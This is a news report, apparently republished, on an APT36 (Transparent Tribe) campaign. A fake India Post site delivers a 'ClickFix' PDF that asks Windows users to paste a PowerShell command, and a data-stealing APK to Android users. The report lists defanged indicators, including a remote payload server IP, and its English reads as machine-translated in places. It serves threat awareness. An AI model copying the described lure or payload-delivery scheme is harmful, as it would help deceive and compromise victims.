The Advanced Persistent Threat (APT) group with ties to Pakistan is attributed to the creation of fake websites decorated in Indian public sector postal systems as part of a campaign designed to infect both domestic windows and Android users.
Cybersecurity company Cyfirma attributes the campaign to a threat actor called APT36, also known as the Transparent Tribe.
A fraudulent website that mimics an Indian post is named “Postindia”.[.]site. “Who lands on the site from Windows Systems will be asked to download the PDF document, but users accessing from Android devices will be provided with a malicious application package (“indiapost.apk”) file.
“When accessed from the desktop, the site provides malicious PDF files containing the ‘Clickfix’ tactic,” Cyfirma said. “This document tells the user to press Win + R, paste the provided PowerShell command into the Run dialog and run it – it could compromise the system.”
An analysis of EXIF data associated with dropped PDFs shows that it was created on October 23, 2024 by an author named “PMYLS”. The domain impersonating India Post was registered on November 20th, 2024, about a month later.
The PowerShell code is designed to download the next stage payload from a remote server (“88.222.245[.]211”) It is currently inactive.
Meanwhile, when the same site accesses from an Android device, it will install mobile apps to encourage users to have a “better experience.” Once installed, this app requires extensive permissions to harvest and remove sensitive data, including contact lists, current locations, and files from external storage.
“Android apps change icons to mimic unsuspecting Google account icons to hide activity, making it difficult for users to find and uninstall apps when they want to delete them,” the company said. “This app also has the ability to force users to accept permissions if denied on the first instance.”
Malicious apps are designed to continue running in the background after the device is restarted, while explicitly looking for permission to ignore battery optimization.
“Clickfix is increasingly being exploited by cybercriminals, fraudsters and APT groups, as reported by other researchers observing its use in the wild,” Cyfirma said. “This new tactic poses a serious threat because it can target both unsuspecting and tech-savvy users who may not be familiar with such methods.”
Source link
